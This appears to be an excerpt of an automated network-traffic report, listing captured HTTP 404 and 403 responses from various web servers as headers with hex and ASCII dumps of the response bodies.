Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471569.7131478444430122158Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRalqKRhpAPAcicqg9spYbaveOVP0+E0FVY69Zfx0yFLg5YZkMPebZiQLt/0/GYZszyrA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,alGcl2prlCF8HwMfrZ9rYKH+o92Cjgvs4rLz3S3oAKE=,/j+AjfLiOiE0Vc9NsP8sK7gAAzzliq9iePftiHVq5jlJpdGUXXdihYUPcFwLcUQYLPdrIc1H06/OFwdhz0Sadw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 93 2c 4e 26 05 e8 b2 0c cb cb 50 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff bd 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 ef e5 1c fc bb a6 89 e8 01 c8 f2 12 df 67 35 04 c9 8c ac 21 8f ee 15 2c 1a eb 42 c4 0a 6b 02 98 40 ac 65 a8 f2 12 ee 55 01 bc 3b 1c 29 a3 82 92 9a fb 42 6a c8 d3 23 56 cb a5 aa db fa 3f 42 eb c1 75 27 39 c5 17 c6 a2 be b5 a2 a2 92 ce 03 0a 6e c3 8c 4f b6 2e aa 10 1a 0e 5f 5a 75 9f 47 7f f3 0f ef f8 95 ad 1b 19 14 4a d8 32 e7 e6 3a 87 72 0e 3d 5f 50 41 03 81 9c 2a 53 e6 51 dc 20 bc cf 1d 31 66 ff b2 e0 a4 f1 5a 06 7c 9c 89 8e fa 18 6e 09 be 70 aa 09 ca 9a 2d 15 5b 36 ed e1 95 1d 2e 67 a7 36 f8 2d b9 c6 a2 95 b0 3c 62 c6 ce ac d6 76 d1 b3 6c 02 4a a1 cb b4 32 77 8c 82 9a 47 aa 46 38 a2 31 f3 88 55 0e 66 79 24 c4 62 b1 48 30 96 49 61 6b 31 93 18 12 6b 12 fc 8a 98 03 9d 47 be c2 d0 15 6d 60 44 df 11 de 8b 5e 4b f2 01 5d 5b 24 8d 74 d2 07 eb 50 53 27 14 e3 46 81 f6 22 54 ca 95 1c af c3 4a cc 30 17 bc f8 1d f4 3d 20 8f ec ce bf c9 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 b3 f4 3c 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 442Vo6_E-,N&Pl((Z:[L(R%Fw9ql7c!q~ypXj}g~6#3s.&jyug5!,Bk@eU;)Bj#V?Bu'9nO._ZuGJ2:r=_PA*SQ 1fZ\|np-[6.g6-<bvlJ2wGF81Ufy$bH0Iak1kGm`D^K][$tPS'F"TJ0= 9<U_`X=`=4toVH<@9Fc3g~6iiy
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:09 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Y8NAHh1g/79ShWfndData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:09 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: pxQtxTMz/PyGxVFsPData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Length: 13691Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471569.9371478897651118264Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRaltsDqnSAYej6vb0pHzfo6Pv+0onXBzV8eFLBxF480qVupvQR8PIyKaPW965IxV4qlQ==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,O/1L7HVJdzQznP2rkpsRxjnWIsxCDt4gAQNDCnrR7Tg=,VI+HaNobgySA5doUjXm1fE25g4VH7sBSTs1/4S1HbnY=,/j+AjfLiOiE0Vc9NsP8sKwcmZX7bZaqsAarZ9kZCraIK4Mgie0A7sA26FMNDNnzmHBYPX2JP4g7LW6bXK9DsVw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 9b c4 4e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 7a 9e 1c 0b df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 444Vo6_E-N&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHqz@9Fc3g~6iiy
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Length: 13695Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 